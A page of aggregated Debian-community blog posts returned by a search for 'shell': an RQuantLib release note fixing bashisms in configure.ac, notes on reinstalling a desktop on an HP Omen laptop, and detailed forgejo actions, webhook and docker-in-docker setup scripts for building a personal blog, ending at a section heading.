Search Results: "shell"

25 March 2025

Dirk Eddelbuettel: RQuantLib 0.4.25 on CRAN: Fix Bashism in Configure

A new minor release 0.4.25 of RQuantLib arrived on CRAN this morning, and has just now been uploaded to Debian too. QuantLib is a rather comprehensive free/open-source library for quantitative finance. RQuantLib connects (some parts of) it to the R environment and language, and has been part of CRAN for nearly twenty-two years (!!) as it was one of the first packages I uploaded to CRAN. This release of RQuantLib was tickled by a request to remove bashisms in shell scripts or, as in my case here, in configure.ac, where I used the non-portable form of string comparison. That has of course been there for umpteen years and never bitten anyone, as the default shell for most systems is in fact bash, but the change has the right idea. And it is of course now mandatory, affecting quite a few packages, as I tooted yesterday. This release also contains an improvement to the macOS 14 build kindly contributed by Jeroen.
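For context, here is a minimal sketch of the kind of change involved (the variable name is made up; the actual tests in configure.ac differ). The bashism uses == inside test, which only bash accepts, while the portable POSIX form uses a single =:
# Bashism: "==" only works when /bin/sh happens to be bash
if test "$enable_feature" == "yes"; then :; fi
# Portable form accepted by dash and any other POSIX shell
if test "$enable_feature" = "yes"; then :; fi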

Changes in RQuantLib version 0.4.25 (2025-03-24)
  • Support macOS 14 with a new compiler flag (Jeroen in #190)
  • Correct two bashisms in configure.ac

One more note, though: This may however be the last release I make with Windows support. CRAN now also checks for forbidden symbols (such as assert or (s)printf) in static libraries, and this release tickled one such warning from the Windows side (which only uses static libraries). I have no desire to get involved in also maintaining QuantLib (no R here) for Windows and may simply turn the package back to OS_type: unix to avoid the hassle. To avoid that, it would be fabulous if someone relying on RQuantLib on Windows could step up and lend a hand looking after that library build. Courtesy of my CRANberries, there is also a diffstat report for this release. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list. Issue tickets can be filed at the GitHub repo. If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

20 March 2025

C.J. Collier: Installing a desktop environment on the HP Omen

dmidecode | grep -A8 '^System Information' tells me that the Manufacturer is HP and Product Name is OMEN Transcend Gaming Laptop 14-fb0xxx. I'm provisioning a new piece of hardware for my eng consultant and it's proving more difficult than I expected. I must admit guilt for some of this difficulty. Instead of installing using the debian installer on my keychain, I dd'd the pv block device of the 16 inch 2023 version onto the partition set aside for it. I then rebooted into rescue mode and cleaned up the grub config, corrected the EFI boot partition's path in /etc/fstab, ran the grub installer from the rescue menu, and rebooted. On the initial boot of the system, X or Wayland or whatever is supposed to be talking to this vast array of GPU hardware in this device is unable to do more than create a black screen on vt1. It's easy enough to switch to vt2 and get a shell on the installed system. So I'm doing that and investigating what's changed in Trixie. It seems like it's pretty significant. Did they just throw out Keith Packard's and Behdad Esfahbod's work on font rendering? I don't understand what's happening in this effort to abstract to a simpler interface. I'll probably end up reading more about it. In an effort to have Debian re-configure the system for Desktop use, I have uninstalled as many packages as I could find that were in the display and human interface category, or were firmware/drivers for devices not present in this Laptop's SoC. Some commands I used to clear these packages and re-install cinnamon follow:
 
dpkg -S /etc/X11
dpkg -S /usr/lib/firmware
apt-get purge $(dpkg -l | grep -i \
  -e gnome -e gtk -e x11-common -e xfonts- -e libvdpau -e dbus-user-session -e gpg-agent \
  -e bluez -e colord -e cups -e fonts -e drm -e xf86 -e mesa -e nouveau -e cinnamon \
  -e avahi -e gdk -e pixel -e desktop -e libreoffice -e x11 -e wayland -e xorg \
  -e firmware-nvidia-graphics -e firmware-amd-graphics -e firmware-mediatek -e firmware-realtek \
  | awk '{ print $2 }')
apt-get autoremove
apt-get purge $(dpkg -l | grep '^r' | awk '{ print $2 }')
tasksel install cinnamon-desktop
 
And then I rebooted. When it came back up, I was greeted with a login prompt, and Trixie looks to be fully functional on this device, including the attached wifi radio, tethering to my android, and the thunderbolt-attached Marvell SFP+ enclosure. I'm also installing libvirt and fetched the DVD iso material for Debian, Ubuntu and Rocky in case we have a need of building VMs during the development process. These are the platforms that I target at work with GCP Dataproc, so I'm pretty good at performing maintenance operations on them at this point.

18 March 2025

Sergio Talens-Oliag: Using actions to build this site

As promised in my previous post, in this entry I'll explain how I've set up forgejo actions on the source repository of this site to build it using a runner instead of doing it on the public server using a webhook to trigger the operation.

Setting up the system
The first thing I've done is to disable the forgejo webhook call that was used to publish the site, as I don't want to run it anymore. After that I added a new workflow to the repository that does the following things:
  • build the site using my hugo-adoc image.
  • push the result to a branch that contains the generated site (we do this because the server is already configured to work with the git repository and we can use force pushes to keep only the last version of the site, removing the need of extra code to manage package uploads and removals).
  • use curl to send a notification to an instance of the webhook server installed on the remote server, which triggers a script that updates the site from the git branch.

Setting up the webhook service
On the server machine we have installed and configured the webhook service to run a script that updates the site. To install the application and set up the configuration we have used the following script:
#!/bin/sh
set -e
# ---------
# VARIABLES
# ---------
ARCH="$(dpkg --print-architecture)"
WEBHOOK_VERSION="2.8.2"
DOWNLOAD_URL="https://github.com/adnanh/webhook/releases/download"
WEBHOOK_TGZ_URL="$DOWNLOAD_URL/$WEBHOOK_VERSION/webhook-linux-$ARCH.tar.gz"
WEBHOOK_SERVICE_NAME="webhook"
# Files
WEBHOOK_SERVICE_FILE="/etc/systemd/system/$WEBHOOK_SERVICE_NAME.service"
WEBHOOK_SOCKET_FILE="/etc/systemd/system/$WEBHOOK_SERVICE_NAME.socket"
WEBHOOK_TML_TEMPLATE="/srv/blogops/action/webhook.yml.envsubst"
WEBHOOK_YML="/etc/webhook.yml"
# Config file values
WEBHOOK_USER="$(id -u)"
WEBHOOK_GROUP="$(id -g)"
WEBHOOK_LISTEN_STREAM="172.31.31.1:4444"
# ----
# MAIN
# ----
# Install binary from releases (on Debian only version 2.8.0 is available, but
# I need the 2.8.2 version to support the systemd activation mode).
curl -fsSL -o "/tmp/webhook.tgz" "$WEBHOOK_TGZ_URL"
tar -C /tmp -xzf /tmp/webhook.tgz
sudo install -m 755 "/tmp/webhook-linux-$ARCH/webhook" /usr/local/bin/webhook
rm -rf "/tmp/webhook-linux-$ARCH" /tmp/webhook.tgz
# Service file
sudo sh -c "cat >'$WEBHOOK_SERVICE_FILE'" <<EOF
[Unit]
Description=Webhook server
[Service]
Type=exec
ExecStart=webhook -nopanic -hooks $WEBHOOK_YML
User=$WEBHOOK_USER
Group=$WEBHOOK_GROUP
EOF
# Socket config
sudo sh -c "cat >'$WEBHOOK_SOCKET_FILE'" <<EOF
[Unit]
Description=Webhook server socket
[Socket]
# Set FreeBind to listen on missing addresses (the VPN can be down sometimes)
FreeBind=true
# Set ListenStream to the IP and port you want to listen on
ListenStream=$WEBHOOK_LISTEN_STREAM
[Install]
WantedBy=multi-user.target
EOF
# Config file
BLOGOPS_TOKEN="$(uuid)" \
  envsubst <"$WEBHOOK_TML_TEMPLATE" | sudo sh -c "cat >$WEBHOOK_YML"
sudo chmod 0640 "$WEBHOOK_YML"
sudo chown "$WEBHOOK_USER:$WEBHOOK_GROUP" "$WEBHOOK_YML"
# Restart and enable service
sudo systemctl daemon-reload
sudo systemctl stop "$WEBHOOK_SERVICE_NAME.socket"
sudo systemctl start "$WEBHOOK_SERVICE_NAME.socket"
sudo systemctl enable "$WEBHOOK_SERVICE_NAME.socket"
# ----
# vim: ts=2:sw=2:et:ai:sts=2
As seen in the code, we've installed the application using a binary from the project repository instead of a package because we needed the latest version of the application to use systemd with socket activation. The configuration file template is the following one:
- id: "update-blogops"
  execute-command: "/srv/blogops/action/bin/update-blogops.sh"
  command-working-directory: "/srv/blogops"
  trigger-rule:
    match:
      type: "value"
      value: "$BLOGOPS_TOKEN"
      parameter:
        source: "header"
        name: "X-Blogops-Token"
The version on /etc/webhook.yml has the BLOGOPS_TOKEN adjusted to a random value that has to be exported as a secret on the forgejo project (see later). Once the service is started, each time the action is executed the webhook daemon gets a notification and runs the following update-blogops.sh script to publish the updated version of the site:
#!/bin/sh
set -e
# ---------
# VARIABLES
# ---------
# Values
REPO_URL="ssh://git@forgejo.mixinet.net/mixinet/blogops.git"
REPO_BRANCH="html"
REPO_DIR="public"
MAIL_PREFIX="[BLOGOPS-UPDATE-ACTION] "
# Address that gets all messages, leave it empty if not wanted
MAIL_TO_ADDR="blogops@mixinet.net"
# Directories
BASE_DIR="/srv/blogops"
PUBLIC_DIR="$BASE_DIR/$REPO_DIR"
NGINX_BASE_DIR="$BASE_DIR/nginx"
PUBLIC_HTML_DIR="$NGINX_BASE_DIR/public_html"
ACTION_BASE_DIR="$BASE_DIR/action"
ACTION_LOG_DIR="$ACTION_BASE_DIR/log"
# Files
OUTPUT_BASENAME="$(date +%Y%m%d-%H%M%S.%N)"
ACTION_LOGFILE_PATH="$ACTION_LOG_DIR/$OUTPUT_BASENAME.log"
# ---------
# Functions
# ---------
action_log() {
  echo "$(date -R) $*" >>"$ACTION_LOGFILE_PATH"
}
action_check_directories() {
  for _d in "$ACTION_BASE_DIR" "$ACTION_LOG_DIR"; do
    [ -d "$_d" ] || mkdir "$_d"
  done
}
action_clean_directories() {
  # Try to remove empty dirs
  for _d in "$ACTION_LOG_DIR" "$ACTION_BASE_DIR"; do
    if [ -d "$_d" ]; then
      rmdir "$_d" 2>/dev/null || true
    fi
  done
}
mail_success() {
  to_addr="$MAIL_TO_ADDR"
  if [ "$to_addr" ]; then
    subject="OK - updated blogops site"
    mail -s "${MAIL_PREFIX}${subject}" "$to_addr" <"$ACTION_LOGFILE_PATH"
  fi
}
mail_failure() {
  to_addr="$MAIL_TO_ADDR"
  if [ "$to_addr" ]; then
    subject="KO - failed to update blogops site"
    mail -s "${MAIL_PREFIX}${subject}" "$to_addr" <"$ACTION_LOGFILE_PATH"
  fi
  exit 1
}
# ----
# MAIN
# ----
ret="0"
# Check directories
action_check_directories
# Go to the base directory
cd "$BASE_DIR"
# Remove the old build dir if present
if [ -d "$PUBLIC_DIR" ]; then
  rm -rf "$PUBLIC_DIR"
fi
# Update the repository checkout
action_log "Updating the repository checkout"
git fetch --all >>"$ACTION_LOGFILE_PATH" 2>&1 || ret="$?"
if [ "$ret" -ne "0" ]; then
  action_log "Failed to update the repository checkout"
  mail_failure
fi
# Get it from the repo branch & extract it
action_log "Downloading and extracting last site version using 'git archive'"
git archive --remote="$REPO_URL" "$REPO_BRANCH" "$REPO_DIR" |
  tar xf - >>"$ACTION_LOGFILE_PATH" 2>&1 || ret="$?"
# Fail if public dir was missing
if [ "$ret" -ne "0" ] || [ ! -d "$PUBLIC_DIR" ]; then
  action_log "Failed to download or extract site"
  mail_failure
fi
# Remove old public_html copies
action_log 'Removing old site versions, if present'
find "$NGINX_BASE_DIR" -mindepth 1 -maxdepth 1 -name 'public_html-*' -type d \
  -exec rm -rf {} \; >>"$ACTION_LOGFILE_PATH" 2>&1 || ret="$?"
if [ "$ret" -ne "0" ]; then
  action_log "Removal of old site versions failed"
  mail_failure
fi
# Switch site directory
TS="$(date +%Y%m%d-%H%M%S)"
if [ -d "$PUBLIC_HTML_DIR" ]; then
  action_log "Moving '$PUBLIC_HTML_DIR' to '$PUBLIC_HTML_DIR-$TS'"
  mv "$PUBLIC_HTML_DIR" "$PUBLIC_HTML_DIR-$TS" >>"$ACTION_LOGFILE_PATH" 2>&1 ||
    ret="$?"
fi
if [ "$ret" -eq "0" ]; then
  action_log "Moving '$PUBLIC_DIR' to '$PUBLIC_HTML_DIR'"
  mv "$PUBLIC_DIR" "$PUBLIC_HTML_DIR" >>"$ACTION_LOGFILE_PATH" 2>&1 ||
    ret="$?"
fi
if [ "$ret" -ne "0" ]; then
  action_log "Site switch failed"
  mail_failure
else
  action_log "Site updated successfully"
  mail_success
fi
# ----
# vim: ts=2:sw=2:et:ai:sts=2

The hugo-adoc workflow
The workflow is defined in the .forgejo/workflows/hugo-adoc.yml file and looks like this:
name: hugo-adoc
# Run this job on push events to the main branch
on:
  push:
    branches:
      - 'main'
jobs:
  build-and-push:
    if: ${{ vars.BLOGOPS_WEBHOOK_URL != '' && secrets.BLOGOPS_TOKEN != '' }}
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/hugo-adoc:latest
    # Allow the job to write to the repository (not really needed on forgejo)
    permissions:
      contents: write
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
        with:
          submodules: 'true'
      - name: Build the site
        shell: sh
        run: |
          rm -rf public
          hugo
      - name: Push compiled site to html branch
        shell: sh
        run: |
          # Set the git user
          git config --global user.email "blogops@mixinet.net"
          git config --global user.name "BlogOps"
          # Create a new orphan branch called html (it was not pulled by the
          # checkout step)
          git switch --orphan html
          # Add the public directory to the branch
          git add public
          # Commit the changes
          git commit --quiet -m "Updated site @ $(date -R)" public
          # Push the changes to the html branch
          git push origin html --force
          # Switch back to the main branch
          git switch main
      - name: Call the blogops update webhook endpoint
        shell: sh
        run: |
          HEADER="X-Blogops-Token: ${{ secrets.BLOGOPS_TOKEN }}"
          curl --fail -k -H "$HEADER" ${{ vars.BLOGOPS_WEBHOOK_URL }}
The only relevant thing is that we have to add the BLOGOPS_TOKEN variable to the project secrets (its value is the one included on the /etc/webhook.yml file created when installing the webhook service) and the BLOGOPS_WEBHOOK_URL project variable (its value is the URL of the webhook server, in my case http://172.31.31.1:4444/hooks/update-blogops); note that the job includes the -k flag on the curl command just in case I end up using TLS on the webhook server in the future, as discussed previously.
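As a quick sanity check, the hook can also be called by hand from a machine that can reach the webhook server; this is a minimal sketch where the placeholder has to be replaced with the token value stored in /etc/webhook.yml:
curl --fail -H "X-Blogops-Token: <token-from-/etc/webhook.yml>" \
  "http://172.31.31.1:4444/hooks/update-blogops"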

Conclusion
Now that I have forgejo actions on my server I no longer need to build the site on the public server as I did initially, a good thing when the server is a small OVH VPS that only runs a couple of containers and a web server directly on the host. I'm still using a notification system to make the server run a script to update the site because that way the forgejo server does not need access to the remote machine shell, only to the webhook server which, IMHO, is a more secure setup.

17 March 2025

Sergio Talens-Oliag: Configuring forgejo actions

Last week I decided I wanted to try out forgejo actions to build this blog instead of using webhooks, so I looked at the documentation and started playing with it until I had it working as I wanted. This post describes how I've installed and configured a forgejo runner, how I've added an oci organization to my instance to build, publish and mirror container images, and how I've added a couple of additional organizations (actions and docker for now) to mirror interesting actions. The changes made to build the site using actions will be documented in a separate post, as I'll be using this entry to test the new setup on the blog project.

Installing the runner
The first thing I've done is to install a runner on my server. I decided to use the OCI image installation method, as it seemed to be the easiest and fastest one. The commands I've used to set up the runner are the following:
$ cd /srv
$ git clone https://forgejo.mixinet.net/blogops/forgejo-runner.git
$ cd forgejo-runner
$ sh ./bin/setup-runner.sh
The setup-runner.sh script does multiple things:
  • create a forgejo-runner user and group
  • create the necessary directories for the runner
  • create a .runner file with a predefined secret and the docker label
The setup-runner.sh code is available here. After running the script, the runner has to be registered with the forgejo server; it can be done using the following command:
$ forgejo forgejo-cli actions register --name "$RUNNER_NAME" \
    --secret "$FORGEJO_SECRET"
The RUNNER_NAME variable is defined on the setup-runner.sh script and the FORGEJO_SECRET must match the value used on the .runner file.

Starting it with docker-compose
To launch the runner I'm going to use a docker-compose.yml file that starts two containers: a docker-in-docker service to run the containers used by the workflow jobs and another one that runs the forgejo-runner itself. The initial version used a TCP port to communicate with the dockerd server from the runner, but when I tried to build images from a workflow I noticed that the containers launched by the runner were not going to be able to execute another dockerd inside the dind one and, even if they were, it was going to be computationally expensive. To avoid the issue I modified the dind service to use a unix socket on a shared volume that can be used by the runner service to communicate with the daemon and also re-shared with the job containers so the dockerd server can be used from them to build images.
Warning: Letting the jobs use the same docker server that runs them has security implications, but this instance is for a home server where I am the only user, so I am not worried about it and this way I can save some resources (in fact, I could use the host docker server directly instead of using a dind service, but just in case I want to run other containers on the host I prefer to keep the one used for the runner isolated from it). For those concerned about sharing the same server, an alternative would be to launch a second dockerd only for the jobs (i.e. actions-dind) using the same approach (the volume with its socket would have to be shared with the runner service so it can be re-shared, but the runner does not need to use it).
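A minimal sketch of what that second daemon could look like as an extra service in the compose file (the actions-dind name and paths are hypothetical, mirroring the dind service shown below):
  actions-dind:
    image: docker:dind
    container_name: 'actions-dind'
    privileged: 'true'
    command: ['dockerd', '-H', 'unix:///actions-dind/docker.sock', '-G', '$RUNNER_GID']
    restart: 'unless-stopped'
    volumes:
      - ./actions-dind:/actions-dind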
The final docker-compose.yaml file is as follows:
services:
  dind:
    image: docker:dind
    container_name: 'dind'
    privileged: 'true'
    command: ['dockerd', '-H', 'unix:///dind/docker.sock', '-G', '$RUNNER_GID']
    restart: 'unless-stopped'
    volumes:
      - ./dind:/dind
  runner:
    image: 'data.forgejo.org/forgejo/runner:6.2.2'
    links:
      - dind
    depends_on:
      dind:
        condition: service_started
    container_name: 'runner'
    environment:
      DOCKER_HOST: 'unix:///dind/docker.sock'
    user: $RUNNER_UID:$RUNNER_GID
    volumes:
      - ./config.yaml:/config.yaml
      - ./data:/data
      - ./dind:/dind
    restart: 'unless-stopped'
    command: '/bin/sh -c "sleep 5; forgejo-runner daemon -c /config.yaml"'
There are multiple things to comment about this file:
  1. The dockerd server is started with the -H unix:///dind/docker.sock flag to use the unix socket to communicate with the daemon instead of using a TCP port (as said, it is faster and allows us to share the socket with the containers started by the runner).
  2. We are running the dockerd daemon with the RUNNER_GID group so the runner can communicate with it (the socket gets that group which is the same used by the runner).
  3. The runner container mounts three volumes: the data directory, the dind folder where docker creates the unix socket and a config.yaml file used by us to change the default runner configuration.
The config.yaml file was originally created using the forgejo-runner generate-config command:
$ docker run --rm data.forgejo.org/forgejo/runner:6.2.2 \
    forgejo-runner generate-config > config.yaml
The changes to it are minimal: the runner capacity has been increased to 2 (which allows it to run two jobs at the same time) and the /dind/docker.sock value has been added to the valid_volumes key to allow the containers launched by the runner to mount it when needed; the diff against the default version is as follows:
@@ -13,7 +13,8 @@
   # Where to store the registration result.
   file: .runner
   # Execute how many tasks concurrently at the same time.
-  capacity: 1
+  # STO: Allow 2 concurrent tasks
+  capacity: 2
   # Extra environment variables to run jobs.
   envs:
     A_TEST_ENV_NAME_1: a_test_env_value_1
@@ -87,7 +88,9 @@
   # If you want to allow any volume, please use the following configuration:
   # valid_volumes:
   #   - '**'
-  valid_volumes: []
+  # STO: Allow to mount the /dind/docker.sock on the containers
+  valid_volumes:
+    - /dind/docker.sock
   # overrides the docker client host with the specified one.
   # If "-" or "", an available docker host will automatically be found.
   # If "automount", an available docker host will automatically be found and ...
To start the runner we export the RUNNER_UID and RUNNER_GID variables and call docker compose up to start the containers in the background:
$ RUNNER_UID="$(id -u forgejo-runner)" RUNNER_GID="$(id -g forgejo-runner)" \
    docker compose up -d
If the server was configured right we are now able to start using actions with this runner.

Preparing the system to run things locally
To avoid unnecessary network traffic we are going to create multiple organizations in our forgejo instance to maintain our own actions and container images and to mirror remote ones. The rationale behind the mirror use is that it greatly reduces the need to connect to remote servers to download the actions and images, which is good for performance and security reasons. In fact, we are going to build our own images for some things to install the tools we want without needing to do it over and over again in the workflow jobs.

Mirrored actions
The actions we are mirroring are on the actions and docker organizations; we have created the following ones for now (the mirrors were created using the forgejo web interface and we have manually disabled all the forgejo modules except the code one for them):
To use our actions by default (i.e., without needing to add the server URL on the uses keyword) we have added the following section to the app.ini file of our forgejo server:
[actions]
ENABLED = true
DEFAULT_ACTIONS_URL = https://forgejo.mixinet.net
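With that in place, workflows can reference mirrored actions using the short form and forgejo resolves them against our instance; a minimal sketch of a step using the actions/checkout mirror (the comment shows the assumed resolution):
    steps:
      - name: Checkout the repo
        # Resolved as https://forgejo.mixinet.net/actions/checkout thanks to DEFAULT_ACTIONS_URL
        uses: actions/checkout@v4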

Setting up credentials to push images
To be able to push images to the oci organization I've created a token with package:write permission for my own user, because I'm a member of the organization and I'm authorized to publish packages on it (a different user could be created, but as I said this is for personal use, so there is no need to complicate things for now). To allow the use of those credentials on the actions I have added a secret (REGISTRY_PASS) and a variable (REGISTRY_USER) to the oci organization. I've also logged in with my local docker client to be able to push images to the oci group by hand, as that is needed for bootstrapping the system (as I'm using local images on the workflows I need to push them to the server before running the ones that are used to build the images).

Local and mirrored images
Our images will be stored on the packages section of a new organization called oci; inside it we have created two projects that use forgejo actions to keep things in shape:
  • images: contains the source files used to generate our own images and the actions to build, tag and push them to the oci organization group.
  • mirrors: contains a configuration file for the regsync tool to mirror containers and an action to run it.
In the next sections we are going to describe the actions and images we have created and mirrored from those projects.

The oci/images project
The images project is a monorepo that contains the source files for the images we are going to build and a couple of actions. The image sources are in subdirectories of the repository; to be considered an image a folder has to contain a Dockerfile that will be used to build the image. The repository has two workflows:
  • build-image-from-tag: Workflow to build, tag and push an image to the oci organization
  • multi-semantic-release: Workflow to create tags for the images using the multi-semantic-release tool.
As the workflows are already configured to use some of our images we pushed some of them from a checkout of the repository using the following commands:
registry="forgejo.mixinet.net/oci"
for img in alpine-mixinet node-mixinet multi-semantic-release; do
  docker build -t $registry/$img:1.0.0 $img
  docker tag $registry/$img:1.0.0 $registry/$img:latest
  docker push $registry/$img:1.0.0
  docker push $registry/$img:latest
done
In the next subsections we will describe what the workflows do and show their source code.

build-image-from-tag workflow
This workflow uses a docker client to build an image from a tag on the repository with the format image-name-v[0-9].[0-9].[0-9]+. As the runner is executed on a container (instead of using lxc) it seemed unreasonable to run another dind container from that one; that is why, after some tests, I decided to share the dind service server socket with the runner container and enabled the option to mount it also on the containers launched by the runner when needed (I only do it on the build-image-from-tag action for now). The action was configured to run using a trigger or when new tags with the right format were created, but when the tag is created by multi-semantic-release the trigger does not work for some reason, so now it only runs the job on triggers and checks if it is launched for a tag with the right format on the job itself. The source code of the action is as follows:
name: build-image-from-tag
on:
  workflow_dispatch:
jobs:
  build:
    # Don't build the image if the registry credentials are not set, the ref is not a tag or it doesn't contain '-v'
    if: ${{ vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' && startsWith(github.ref, 'refs/tags/') && contains(github.ref, '-v') }}
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
      # Mount the dind socket on the container at the default location
      options: -v /dind/docker.sock:/var/run/docker.sock
    steps:
      - name: Extract image name and tag from git and get registry name from env
        id: job_data
        run: |
          echo "::set-output name=img_name::${GITHUB_REF_NAME%%-v*}"
          echo "::set-output name=img_tag::${GITHUB_REF_NAME##*-v}"
          echo "::set-output name=registry::$(
            echo "${{ github.server_url }}" | sed -e 's%https://%%'
          )"
          echo "::set-output name=oci_registry_prefix::$(
            echo "${{ github.server_url }}/oci" | sed -e 's%https://%%'
          )"
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Export build dir and Dockerfile
        id: build_data
        run: |
          img="${{ steps.job_data.outputs.img_name }}"
          build_dir="$(pwd)/${img}"
          dockerfile="${build_dir}/Dockerfile"
          if [ -f "$dockerfile" ]; then
            echo "::set-output name=build_dir::$build_dir"
            echo "::set-output name=dockerfile::$dockerfile"
          else
            echo "Couldn't find the Dockerfile for the '$img' image"
            exit 1
          fi
      - name: Login to the Container Registry
        uses: docker/login-action@v3
        with:
          registry: ${{ steps.job_data.outputs.registry }}
          username: ${{ vars.REGISTRY_USER }}
          password: ${{ secrets.REGISTRY_PASS }}
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3
      - name: Build and Push
        uses: docker/build-push-action@v6
        with:
          push: true
          tags: |
            ${{ steps.job_data.outputs.oci_registry_prefix }}/${{ steps.job_data.outputs.img_name }}:${{ steps.job_data.outputs.img_tag }}
            ${{ steps.job_data.outputs.oci_registry_prefix }}/${{ steps.job_data.outputs.img_name }}:latest
          context: ${{ steps.build_data.outputs.build_dir }}
          file: ${{ steps.build_data.outputs.dockerfile }}
          build-args: |
            OCI_REGISTRY_PREFIX=${{ steps.job_data.outputs.oci_registry_prefix }}/
Some notes about this code:
  1. The if condition of the build job is not perfect, but it is good enough to avoid wrong uses as long as nobody uses manual tags with the wrong format and expects things to work (it checks if the REGISTRY_USER and REGISTRY_PASS variables are set, if the ref is a tag and if it contains the -v string).
  2. To be able to access the dind socket we mount it on the container using the options key on the container section of the job (this only works if supported by the runner configuration as explained before).
  3. We use the job_data step to get information about the image from the tag and the registry URL from the environment variables, it is executed first because all the information is available without checking out the repository.
  4. We use the build_data step to get the build dir and Dockerfile paths from the repository (right now we are assuming fixed paths and checking if the Dockerfile exists, but in the future we could use a configuration file to get them, if needed).
  5. As we are using a docker daemon that is already running there is no need to use the docker/setup-docker-action to install it.
  6. On the build and push step we pass the OCI_REGISTRY_PREFIX build argument to the Dockerfile to be able to use it on the FROM instruction (we are using it in our images, as sketched below).
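A minimal sketch of how a Dockerfile in this repository could consume that build argument (the base image name is just an example taken from the images we push):
ARG OCI_REGISTRY_PREFIX
# Expands to something like forgejo.mixinet.net/oci/ when built by the workflow
FROM ${OCI_REGISTRY_PREFIX}alpine-mixinet:latest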

multi-semantic-release workflow
This workflow is used to run the multi-semantic-release tool on pushes to the main branch. It is configured to create the configuration files on the fly (it prepares things to tag the folders that contain a Dockerfile using a couple of template files available on the repository's .forgejo directory) and run the multi-semantic-release tool to create tags and push them to the repository if new versions are to be built. Initially we assumed that the tag creation pushed by multi-semantic-release would be enough to run the build-tagged-image-task action, but as it didn't work we removed the rule to run the action on tag creation and added code to trigger the action using an API call for the newly created tags (we get them from the output of the multi-semantic-release execution). The source code of the action is as follows:
name: multi-semantic-release
on:
  push:
    branches:
      - 'main'
jobs:
  multi-semantic-release:
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/multi-semantic-release:latest
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Generate multi-semantic-release configuration
        shell: sh
        run: |
          # Get the list of images to work with (the folders that have a Dockerfile)
          images="$(for img in */Dockerfile; do dirname "$img"; done)"
          # Generate a values.yaml file for the main packages.json file
          package_json_values_yaml=".package.json-values.yaml"
          echo "images:" >"$package_json_values_yaml"
          for img in $images; do
            echo " - $img" >>"$package_json_values_yaml"
          done
          echo "::group::Generated values.yaml for the project"
          cat "$package_json_values_yaml"
          echo "::endgroup::"
          # Generate the package.json file validating that is a good json file with jq
          tmpl -f "$package_json_values_yaml" ".forgejo/package.json.tmpl" | jq . > "package.json"
          echo "::group::Generated package.json for the project"
          cat "package.json"
          echo "::endgroup::"
          # Remove the temporary values file
          rm -f "$package_json_values_yaml"
          # Generate the package.json file for each image
          for img in $images; do
            tmpl -v "img_name=$img" -v "img_path=$img" ".forgejo/ws-package.json.tmpl" | jq . > "$img/package.json"
            echo "::group::Generated package.json for the '$img' image"
            cat "$img/package.json"
            echo "::endgroup::"
          done
      - name: Run multi-semantic-release
        shell: sh
        run: |
          multi-semantic-release | tee .multi-semantic-release.log
      - name: Trigger builds
        shell: sh
        run: |
          # Get the list of tags published on the previous steps
          tags="$(
            sed -n -e 's/^\[.*\] \[\(.*\)\] .* Published release \([0-9]\+\.[0-9]\+\.[0-9]\+\) on .*$/\1-v\2/p' \
              .multi-semantic-release.log
          )"
          rm -f .multi-semantic-release.log
          if [ "$tags" ]; then
            # Prepare the url for building the images
            workflow="build-image-from-tag.yaml"
            dispatch_url="${{ github.api_url }}/repos/${{ github.repository }}/actions/workflows/$workflow/dispatches"
            echo "$tags" | while read -r tag; do
              echo "Triggering build for tag '$tag'"
              curl \
                -H "Content-Type:application/json" \
                -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
                -d "{\"ref\":\"$tag\"}" "$dispatch_url"
            done
          fi
Notes about this code:
  1. The use of the tmpl tool to process the multi-semantic-release configuration templates comes from previous uses; in this case we could have used a different approach (e.g. envsubst), but we kept it because it keeps things simple and can be useful in the future if we want to do more complex things with the template files.
  2. We use tee to show and dump to a file the output of the multi-semantic-release execution.
  3. We get the list of pushed tags using sed against the output of the multi-semantic-release execution and for each one found we use curl to call the forgejo API to trigger the build job; as the call is against the same project we can use the GITHUB_TOKEN generated for the workflow to do it, without creating a user token that has to be shared as a secret.
The .forgejo/package.json.tmpl file is the following one:
 
{
  "name": "multi-semantic-release",
  "version": "0.0.0-semantically-released",
  "private": true,
  "multi-release": {
    "tagFormat": "${name}-v${version}"
  },
  "workspaces": {{ .images | toJson }}
}
As can be seen, it only needs a list of paths to the images as argument (the file we generate contains the names and paths, but it could be simplified). And the .forgejo/ws-package.json.tmpl file is the following one:
 
{
  "name": "{{ .img_name }}",
  "license": "UNLICENSED",
  "release": {
    "plugins": [
      [
        "@semantic-release/commit-analyzer",
        {
          "preset": "conventionalcommits",
          "releaseRules": [
            { "breaking": true, "release": "major" },
            { "revert": true, "release": "patch" },
            { "type": "feat", "release": "minor" },
            { "type": "fix", "release": "patch" },
            { "type": "perf", "release": "patch" }
          ]
        }
      ],
      [
        "semantic-release-replace-plugin",
        {
          "replacements": [
            {
              "files": [ "{{ .img_path }}/msr.yaml" ],
              "from": "^version:.*$",
              "to": "version: ${nextRelease.version}",
              "allowEmptyPaths": true
            }
          ]
        }
      ],
      [
        "@semantic-release/git",
        {
          "assets": [ "msr.yaml" ],
          "message": "ci(release): {{ .img_name }}-v${nextRelease.version}\n\n${nextRelease.notes}"
        }
      ]
    ],
    "branches": [ "main" ]
  }
}

The oci/mirrors project
The repository contains a template for the configuration file we are going to use with regsync (regsync.envsubst.yml) to mirror images from remote registries using a workflow that generates a configuration file from the template and runs the tool. The initial version of the regsync.envsubst.yml file is prepared to mirror alpine containers from version 3.21 to 3.29 (we explicitly exclude version 3.20) and needs the forgejo.mixinet.net/oci/node-mixinet:latest image to run (as explained before, it was pushed manually to the server):
version: 1
creds:
  - registry: "$REGISTRY"
    user: "$REGISTRY_USER"
    pass: "$REGISTRY_PASS"
sync:
  - source: alpine
    target: $REGISTRY/oci/alpine
    type: repository
    tags:
      allow:
        - "latest"
        - "3\\.2\\d+"
        - "3\\.2\\d+.\\d+"
      deny:
        - "3\\.20"
        - "3\\.20.\\d+"

mirror workflow
